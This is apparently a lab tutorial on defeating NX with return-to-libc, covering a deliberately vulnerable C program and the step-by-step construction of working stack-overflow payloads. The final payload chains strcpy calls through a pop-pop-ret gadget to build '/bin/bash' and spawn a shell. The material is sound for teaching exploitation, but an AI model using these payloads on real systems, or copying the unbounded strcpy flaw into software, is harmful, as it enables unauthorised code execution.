Defeating NX: The Return-to-libc Method
13 Oct 2022
In “Defeating ASLR: The Return-to-pop Method”, I constructed a payload that used the ret and pop-ret instructions to inject shellcode into our vulnerable program with ASLR enabled but the non-executable stack protection (hereinafter “NX”) disabled. The payload worked as expected because we knew that the memory space between ans_buf and the address we were returning to was larger than our shellcode. What if the memory space is not large enough? More importantly, what if we have no shellcode at our disposal? In this post, I describe an exploitation technique called “return-to-libc”, which uses code that already exists in the process (“libc” is the conventional shorthand for the standard C library) to spawn a shell. The post is organized into two parts: in the first part, ASLR is turned off; in the second part, both ASLR and NX are enabled.
Part I
Let’s first disable ASLR:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
The vulnerable program contains the following code:
/* ans_check.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_answer(char *ans) {
    int ans_flag = 0;
    char ans_buf[38];

    /* Unbounded copy: this is the overflow we exploit. */
    strcpy(ans_buf, ans);
    if (strcmp(ans_buf, "forty-two") == 0)
        ans_flag = 1;
    return ans_flag;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <answer>\n", argv[0]);
        exit(0);
    }
    if (check_answer(argv[1])) {
        printf("Right answer!\n");
    } else {
        printf("Wrong answer!\n");
    }
    printf("About to exit!\n");
    fflush(stdout);
    system("/bin/date");
    fflush(stdout);
}
Compile ans_check.c with the -fno-stack-protector option to disable stack canaries while leaving NX enabled, then run the program:
$ touch ans_check.c
$ vim ans_check.c
$ gcc -g -m32 -no-pie -fno-stack-protector ans_check.c -o ans_check
$ ./ans_check forty-one
Wrong answer!
About to exit!
Thu Oct 6 11:27:14 EDT 2022
The payload for the return-to-libc exploit should have the following structure:
PADDING | &system() | &exit_path | &cmd_string
Ignoring the padding, the first two values are addresses of code. The third value is the address of a properly terminated string containing the name of the program that we wish to execute. In our examples, we will use “/bin/bash”. The amount of PADDING must be such that the &system() value overwrites the return address on the stack.
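The layout above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the helper names p32 and ret2libc_payload are hypothetical, and the offset and addresses are the values this post arrives at further down, which will differ on any other build or machine.

```python
import struct


def p32(addr: int) -> bytes:
    """Pack a 32-bit address in little-endian order, as x86 expects."""
    return struct.pack("<I", addr)


def ret2libc_payload(offset: int, system_addr: int,
                     exit_addr: int, cmd_addr: int) -> bytes:
    """PADDING | &system() | &exit_path | &cmd_string."""
    padding = b"\x90" * offset          # filler up to the saved return address
    return padding + p32(system_addr) + p32(exit_addr) + p32(cmd_addr)


# Values assumed from later in this post (Part I).
payload = ret2libc_payload(54, 0x08049110, 0x080492EE, 0xFFFFD82E)
print(payload[-12:].hex())
```

When system() is entered through a ret, it finds &exit_path where it expects its return address and &cmd_string where it expects its first argument, which is why the three values must appear in exactly this order.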
Addresses We Need
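Let’s find an address through which we can call the system() standard C library function. Because the program itself calls system(), the binary contains a PLT entry for it (the commands below refer to the binary as ans_check7):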
$ objdump -D ans_check7 | grep system
08049110 <system@plt>:
8049363: e8 a8 fd ff ff call 8049110 <system@plt>
We shall use the address 0x08049110 for &system().
Find an address to serve as the &exit_path:
$ objdump -D ans_check7 | grep -A 30 \<main\>
080492ae <main>:
...
80492ee: 6a 00 push $0x0
80492f0: e8 2b fe ff ff call 8049120 <exit@plt>
...
8049301: e8 50 ff ff ff call 8049256 <check_answer>
8049306: 83 c4 10 add $0x10,%esp
...
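We shall use the address 0x080492ee for &exit_path: it holds the push $0x0 that sets up the argument for the call to exit@plt that follows, so returning there executes exit(0). Additionally, the listing shows that the check_answer() function returns to the address 0x08049306.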
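To find the address of our command string “/bin/bash”, which is already present in the process as the value of the SHELL environment variable, the find_var.c program may be used: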
/* find_var.c */
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    if (!argv[1])
        exit(1);
    /* Print the address of the named environment variable's value. */
    printf("%p\n", getenv(argv[1]));
    return 0;
}
Alternatively, we can inspect the top of the stack in gdb:
gdb-peda$ x/20s 0xffffd7e2
0xffffd7e2: "forty-one"
0xffffd7ec: "SHELL=/bin/bash"
0xffffd7fc: "SUDO_GID=1000"
0xffffd80a: "SUDO_COMMAND=/usr/bin/su seed"
0xffffd828: "SUDO_USER=ubuntu"
0xffffd839: "PWD=/home/seed/Documents/cse523s/return2libc"
0xffffd866: "LOGNAME=seed"
0xffffd873: "_=/usr/bin/gdb"
0xffffd882: "LINES=21"
0xffffd88b: "HOME=/home/seed"
0xffffd89b: "LANG=C.UTF-8"
...
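The output shows that the entry SHELL=/bin/bash starts at 0xffffd7ec, so the value /bin/bash itself begins six bytes later, at 0xffffd7f2. Running find_var on the SHELL variable outside gdb, however, I got the output 0xffffd832. The difference comes from the environment that gdb adds: if we type unset environment LINES and unset environment COLUMNS in gdb, the two addresses should be identical.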
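The address arithmetic here is easy to get wrong, so a small sketch may help. The first helper skips the NAME= prefix of an environment entry. The second applies a commonly cited rule of thumb, which is an assumption on my part and not something this post measures directly: the invoked program path is stored above the environment strings twice, so each extra character in the path moves an environment string two bytes lower. Both function names are hypothetical, and the invocation paths ./find_var and ./ans_check7 are assumed.

```python
def env_value_addr(entry_addr: int, name: str) -> int:
    """Address of VALUE, given the address of the 'NAME=VALUE' string."""
    return entry_addr + len(name) + 1   # skip NAME and the '=' sign


def adjust_for_program_name(reported: int, helper: str, target: str) -> int:
    """Rule of thumb (assumed): 2 bytes lower per extra path character."""
    return reported - 2 * (len(target) - len(helper))


# gdb shows the entry "SHELL=/bin/bash" at 0xffffd7ec.
print(hex(env_value_addr(0xFFFFD7EC, "SHELL")))

# find_var reported 0xffffd832; the target's path is two characters longer.
print(hex(adjust_for_program_name(0xFFFFD832, "./find_var", "./ans_check7")))
```

Under these assumptions the second call yields 0xffffd82e. Stack alignment and other differences between the two runs can still shift the address, so treat the result as a starting point to be confirmed by experiment.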
Assemble the Payload
We are now ready to construct our payload using the addresses we just gathered. First, run echo $$ to record the PID of the current shell, so that we can later confirm that a new shell was spawned:
$ echo $$
2366
I then tried the following input string:
$ ./ans_check7 $(perl -e 'print "\x90"x2, "\x10\x91\x04\x08"x19, "\xee\x92\x04\x08", "\x32\xd8\xff\xff"')
which produces:
sh: 1: <???%>: not found
sh: 1: <???%>: not found
sh: 1: <???%>: not found
sh: 1: <???%>: not found
sh: 1: j: not found
Note that the two leading NOP bytes in our payload are there to satisfy the four-byte alignment requirement, given that ans_buf has a size of 38 bytes. The output indicates that &system() does overwrite the return address, but the address of the SHELL string is not yet in the position where system() looks for its argument. I kept decreasing the repeat count of &system() until:
$ ./ans_check7 $(perl -e 'print "\x90"x2, "\x10\x91\x04\x08"x14, "\xee\x92\x04\x08", "\x32\xd8\xff\xff"')
sh: 1: /bash: not found
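This result indicates that the pointer to the SHELL value is now correctly positioned, but the address I provided is off by a few bytes: system() received a pointer into the middle of /bin/bash. Since /bash starts four bytes after /bin/bash, I changed the byte sequence \x32\xd8\xff\xff to \x2e\xd8\xff\xff: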
$ ./ans_check7 $(perl -e 'print "\x90"x2, "\x10\x91\x04\x08"x14, "\xee\x92\x04\x08", "\x2e\xd8\xff\xff"')
$ echo $$
3641
The shell is spawned successfully. Alternatively, this command also works:
$ ./ans_check7 $(perl -e 'print "\x90"x54, "\x10\x91\x04\x08", "\xee\x92\x04\x08", "\x2e\xd8\xff\xff"')
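Both working commands put &system() at the same distance from the start of ans_buf. The following sketch rebuilds the two byte strings and checks that claim; the constant RET_OFFSET is inferred from the commands above (2 NOPs plus 13 four-byte words) and is not something the post states explicitly.

```python
import struct

SYSTEM = struct.pack("<I", 0x08049110)      # &system() from the objdump output
TAIL = struct.pack("<II", 0x080492EE, 0xFFFFD82E)  # &exit_path, &cmd_string

# Variant 1: two NOPs for alignment, then &system() repeated 14 times.
sprayed = b"\x90" * 2 + SYSTEM * 14 + TAIL
# Variant 2: 54 NOPs, then a single &system().
padded = b"\x90" * 54 + SYSTEM + TAIL

RET_OFFSET = 2 + 13 * 4   # inferred: offset of the saved return address

# In both variants the word at RET_OFFSET is &system(), followed by TAIL.
assert sprayed[RET_OFFSET:] == padded[RET_OFFSET:] == SYSTEM + TAIL
print(RET_OFFSET, len(sprayed), len(padded))
```

Repeating &system() is a convenient way to search for the offset by trial and error, while the NOP-padded form documents the offset once it is known.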
Part II
Ensure that ASLR is turned on:
$ cat /proc/sys/kernel/randomize_va_space
2
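With ASLR enabled, the stack address of the SHELL environment variable changes on every run, so we can no longer hard-code it. Instead, we can use the return-to-libc method to construct our target string at a fixed address of our choosing, and then pass this address to system(). In particular, we can construct a build-string payload with the following organization: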
&strcpy@plt | &pop-pop-ret | str_loc_1 | src_byte_addr_1 |
&strcpy@plt | &pop-pop-ret | str_loc_2 | src_byte_addr_2 |
...
&strcpy@plt | &pop-pop-ret | str_loc_n | src_byte_addr_n |
where:
- &strcpy@plt is the address of the PLT entry for the strcpy libc function, which will be used to create our desired string by copying it one character at a time;
- &pop-pop-ret is the address of a pop-pop-ret instruction sequence in our binary;
- the str_loc_i’s are our chosen destination addresses, one per character of the string;
- src_byte_addr_i is the address that holds the byte representation of the ith character in our target string;
- the &strcpy@plt on the first line is positioned within the payload to overwrite the return address on the stack.
If we place the above values properly on the stack, our vulnerable program will return to the first &strcpy@plt instead of its original return address. And what will happen? The addresses str_loc_1 and src_byte_addr_1 are the arguments for the strcpy libc function, so the character stored at src_byte_addr_1 will be copied into str_loc_1. (strcpy keeps copying until it reaches a null byte, so any bytes that follow the character are copied as well; the next call overwrites them.) The strcpy function will subsequently return to the first &pop-pop-ret sequence, which pops str_loc_1 and src_byte_addr_1 off the stack; its ret then pops the next address (the second &strcpy@plt) and jumps to it. In this way, our n strcpy calls are chained together to create an n-byte string starting at str_loc_1, with the last call copying the terminating null byte. The new payload we are developing has the following structure:
PADDING | build-string-payload | &system() | &exit_path | &cmd_string
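To make the control flow concrete, here is a toy model that walks a list of stack words the way successive ret instructions would. It is a sketch only: the stack holds symbolic names instead of real addresses, the function trace_chain is hypothetical, and the model assumes the 32-bit cdecl convention in which a callee finds its return address first and its arguments right after it.

```python
STRCPY, POP_POP_RET = "strcpy@plt", "pop-pop-ret"
SYSTEM, EXIT_PATH = "system@plt", "exit_path"


def trace_chain(stack):
    """Return the calls made when control flow follows the stack words."""
    calls = []
    sp = 0                                   # index of the word the next ret pops
    while sp < len(stack):
        target = stack[sp]                   # ret: pop one word into EIP
        sp += 1
        if target == STRCPY:
            # stack[sp] is strcpy's return address; the arguments follow it.
            calls.append(("strcpy", stack[sp + 1], stack[sp + 2]))
        elif target == POP_POP_RET:
            sp += 2                          # two pops discard dst and src
        elif target == SYSTEM:
            calls.append(("system", stack[sp + 1]))
        elif target == EXIT_PATH:
            calls.append(("exit",))
            break
        else:
            raise ValueError(f"unexpected word on the stack: {target!r}")
    return calls


stack = [
    STRCPY, POP_POP_RET, "str_loc_1", "src_byte_addr_1",
    STRCPY, POP_POP_RET, "str_loc_2", "src_byte_addr_2",
    SYSTEM, EXIT_PATH, "str_loc_1",
]
for call in trace_chain(stack):
    print(call)
```

The trace shows why the gadget has exactly two pops: strcpy takes two arguments, and both must be skipped before the next ret can reach the following &strcpy@plt.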
We can use the same method shown in Part I to obtain the addresses of system(), exit(0), strcpy(), and pop-pop-ret. Next, we choose an address to serve as our string destination. The chosen address needs to be stable, readable, writable, and safe to overwrite. In our example, we will use the .bss section of the address space. We can find its address with the readelf utility:
$ readelf -S ans_check
There are 36 section headers, starting at offset 0x41f8:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 080481b4 0001b4 000013 00 A 0 0 1
[ 2] .note.gnu.build-i NOTE 080481c8 0001c8 000024 00 A 0 0 4
[ 3] .note.gnu.propert NOTE 080481ec 0001ec 00001c 00 A 0 0 4
[ 4] .note.ABI-tag NOTE 08048208 000208 000020 00 A 0 0 4
[ 5] .gnu.hash GNU_HASH 08048228 000228 000020 04 A 6 0 4
[ 6] .dynsym DYNSYM 08048248 000248 0000c0 10 A 7 1 4
[ 7] .dynstr STRTAB 08048308 000308 000079 00 A 0 0 1
[ 8] .gnu.version VERSYM 08048382 000382 000018 02 A 6 0 2
[ 9] .gnu.version_r VERNEED 0804839c 00039c 000020 00 A 7 1 4
[10] .rel.dyn REL 080483bc 0003bc 000010 08 A 6 0 4
[11] .rel.plt REL 080483cc 0003cc 000040 08 AI 6 24 4
[12] .init PROGBITS 08049000 001000 000024 00 AX 0 0 4
[13] .plt PROGBITS 08049030 001030 000090 04 AX 0 0 16
[14] .plt.sec PROGBITS 080490c0 0010c0 000080 10 AX 0 0 16
[15] .text PROGBITS 08049140 001140 0002c9 00 AX 0 0 16
[16] .fini PROGBITS 0804940c 00140c 000018 00 AX 0 0 4
[17] .rodata PROGBITS 0804a000 002000 00005b 00 A 0 0 4
[18] .eh_frame_hdr PROGBITS 0804a05c 00205c 000054 00 A 0 0 4
[19] .eh_frame PROGBITS 0804a0b0 0020b0 000148 00 A 0 0 4
[20] .init_array INIT_ARRAY 0804bf08 002f08 000004 04 WA 0 0 4
[21] .fini_array FINI_ARRAY 0804bf0c 002f0c 000004 04 WA 0 0 4
[22] .dynamic DYNAMIC 0804bf10 002f10 0000e8 08 WA 7 0 4
[23] .got PROGBITS 0804bff8 002ff8 000008 04 WA 0 0 4
[24] .got.plt PROGBITS 0804c000 003000 00002c 04 WA 0 0 4
[25] .data PROGBITS 0804c02c 00302c 000008 00 WA 0 0 4
[26] .bss NOBITS 0804c034 003034 000004 00 WA 0 0 1
[27] .comment PROGBITS 00000000 003034 00002b 01 MS 0 0 1
[28] .debug_aranges PROGBITS 00000000 00305f 000020 00 0 0 1
[29] .debug_info PROGBITS 00000000 00307f 000388 00 0 0 1
[30] .debug_abbrev PROGBITS 00000000 003407 00010a 00 0 0 1
[31] .debug_line PROGBITS 00000000 003511 000129 00 0 0 1
[32] .debug_str PROGBITS 00000000 00363a 0002ea 01 MS 0 0 1
[33] .symtab SYMTAB 00000000 003924 0004f0 10 34 50 4
[34] .strtab STRTAB 00000000 003e14 000286 00 0 0 1
[35] .shstrtab STRTAB 00000000 00409a 00015d 00 0 0 1
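The .bss section starts at 0x0804c034 with flags W (write) and A (alloc). However, rather than using that exact address as our string destination, we will choose a slightly higher address such that none of the destination addresses contains a 0x00 byte, because a null byte inside the payload would end the command-line argument early. Here, we shall use the address 0x0804c041, i.e. str_loc_1 = 0x0804c041. Although .bss itself is only 4 bytes long, this address lies in the same writable page.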
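The choice of destination can be checked mechanically. The sketch below assumes the target string is /bin/bash plus its terminator (ten bytes) and verifies that none of the ten destination addresses contains a null byte once packed in little-endian order; the helper has_null_byte is a hypothetical name.

```python
import struct

STR_LOC_1 = 0x0804C041
TARGET = b"/bin/bash\x00"                   # nine characters plus terminator


def has_null_byte(addr: int) -> bool:
    """True if the little-endian encoding of addr contains a 0x00 byte."""
    return b"\x00" in struct.pack("<I", addr)


dests = [STR_LOC_1 + i for i in range(len(TARGET))]
assert not any(has_null_byte(a) for a in dests)
print(hex(dests[0]), hex(dests[-1]))

# Counterexample: a run of destinations that crosses 0x0804c100 would fail.
print(has_null_byte(0x0804C100))
```

The same check is worth running on every other address that goes into the payload, since a single null byte anywhere would truncate it.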
Find the Characters
Finally, we need to assemble the addresses of the characters that will be used to create our string. Use the command:
$ readelf -x i ans_check
to dump the sections one at a time, replacing i with a section number. I dumped the read-only data section (.rodata, number 17):
$ readelf -x 17 ans_check
Hex dump of section '.rodata':
0x0804a000 03000000 01000200 666f7274 792d7477 ........forty-tw
0x0804a010 6f005573 6167653a 20257320 3c616e73 o.Usage: %s <ans
0x0804a020 7765723e 0a005269 67687420 616e7377 wer>..Right answ
0x0804a030 65722100 57726f6e 6720616e 73776572 er!.Wrong answer
0x0804a040 21004162 6f757420 746f2065 78697421 !.About to exit!
0x0804a050 002f6269 6e2f6461 746500 ./bin/date.
Below are the addresses I chose:
Character | Hex Representation | Payload Tag | Address |
---|---|---|---|
/ | 2f | src_byte_addr_1, src_byte_addr_5 | 0x0804a051 |
b | 62 | src_byte_addr_2, src_byte_addr_6 | 0x0804a052 |
i | 69 | src_byte_addr_3 | 0x0804a053 |
n | 6e | src_byte_addr_4 | 0x0804a054 |
a | 61 | src_byte_addr_7 | 0x0804a057 |
s | 73 | src_byte_addr_8 | 0x0804a013 |
h | 68 | src_byte_addr_9 | 0x0804a029 |
null_terminator | 00 | src_byte_addr_10 | 0x0804a050 |
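The table can be checked against the hex dump, and the effect of the ten strcpy calls can be simulated. The sketch below transcribes the .rodata bytes from the dump above and models memory as a dictionary; the functions strcpy and read_cstring are simplified stand-ins written for this illustration, not the libc routines.

```python
RODATA_BASE = 0x0804A000
RODATA = bytes.fromhex(
    "03000000 01000200 666f7274 792d7477 "
    "6f005573 6167653a 20257320 3c616e73 "
    "7765723e 0a005269 67687420 616e7377 "
    "65722100 57726f6e 6720616e 73776572 "
    "21004162 6f757420 746f2065 78697421 "
    "002f6269 6e2f6461 746500"
)
SRC_ADDRS = [0x0804A051, 0x0804A052, 0x0804A053, 0x0804A054, 0x0804A051,
             0x0804A052, 0x0804A057, 0x0804A013, 0x0804A029, 0x0804A050]
TARGET = b"/bin/bash\x00"
STR_LOC_1 = 0x0804C041

# Each chosen address must hold the matching byte of the target string.
for wanted, addr in zip(TARGET, SRC_ADDRS):
    assert RODATA[addr - RODATA_BASE] == wanted


def strcpy(mem, dst, src):
    """Copy bytes from .rodata into mem up to and including the null byte."""
    while True:
        byte = RODATA[src - RODATA_BASE]
        mem[dst] = byte
        if byte == 0:
            return
        dst += 1
        src += 1


def read_cstring(mem, addr):
    """Read a null-terminated string out of the simulated memory."""
    out = bytearray()
    while mem[addr] != 0:
        out.append(mem[addr])
        addr += 1
    return bytes(out)


mem = {}
for i, src in enumerate(SRC_ADDRS):
    strcpy(mem, STR_LOC_1 + i, src)
print(read_cstring(mem, STR_LOC_1))
```

Each call copies more than one byte (the eighth, for instance, copies the rest of the usage message), but every later call overwrites the surplus, and the final call writes the terminator.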
Assemble the Payload
Our constructed build-string payload may look like this:
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x41\xc0\x04\x08 | \x51\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x42\xc0\x04\x08 | \x52\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x43\xc0\x04\x08 | \x53\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x44\xc0\x04\x08 | \x54\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x45\xc0\x04\x08 | \x51\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x46\xc0\x04\x08 | \x52\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x47\xc0\x04\x08 | \x57\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x48\xc0\x04\x08 | \x13\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x49\xc0\x04\x08 | \x29\xa0\x04\x08 |
\xf0\x90\x04\x08 | \xf2\x93\x04\x08 | \x4a\xc0\x04\x08 | \x50\xa0\x04\x08
Running the complete payload spawns a shell, as the changed PID confirms:
$ echo $$
1950
$ ./ans_check7 $(perl -e 'print
"\x90"x2, "\x10\x91\x04\x08"x13,
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x41\xc0\x04\x08\x51\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x42\xc0\x04\x08\x52\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x43\xc0\x04\x08\x53\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x44\xc0\x04\x08\x54\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x45\xc0\x04\x08\x51\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x46\xc0\x04\x08\x52\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x47\xc0\x04\x08\x57\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x48\xc0\x04\x08\x13\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x49\xc0\x04\x08\x29\xa0\x04\x08",
"\xf0\x90\x04\x08\xf2\x93\x04\x08\x4a\xc0\x04\x08\x50\xa0\x04\x08",
"\x10\x91\x04\x08", "\xee\x92\x04\x08", "\x41\xc0\x04\x08"')
$ echo $$
1962
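Typing forty addresses by hand invites mistakes, so the payload can also be generated. The following sketch rebuilds the same bytes as the Perl command above from the addresses gathered in this post; the variable names are my own, and the padding simply mirrors the command (2 NOPs followed by 13 copies of &system()).

```python
import struct

SYSTEM, EXIT_PATH = 0x08049110, 0x080492EE
STRCPY_PLT, POP_POP_RET = 0x080490F0, 0x080493F2
STR_LOC_1 = 0x0804C041
SRC_ADDRS = [0x0804A051, 0x0804A052, 0x0804A053, 0x0804A054, 0x0804A051,
             0x0804A052, 0x0804A057, 0x0804A013, 0x0804A029, 0x0804A050]


def p32(addr: int) -> bytes:
    """Pack a 32-bit address in little-endian order."""
    return struct.pack("<I", addr)


# One four-word group per character: strcpy, gadget, destination, source.
chain = b"".join(
    p32(STRCPY_PLT) + p32(POP_POP_RET) + p32(STR_LOC_1 + i) + p32(src)
    for i, src in enumerate(SRC_ADDRS)
)
padding = b"\x90" * 2 + p32(SYSTEM) * 13     # 54 bytes, as in the command
payload = padding + chain + p32(SYSTEM) + p32(EXIT_PATH) + p32(STR_LOC_1)

assert b"\x00" not in payload                # argv cannot carry null bytes
print(len(payload), chain[:16].hex())
```

The null-byte assertion is the important part: it catches an unusable address before the payload ever reaches the command line.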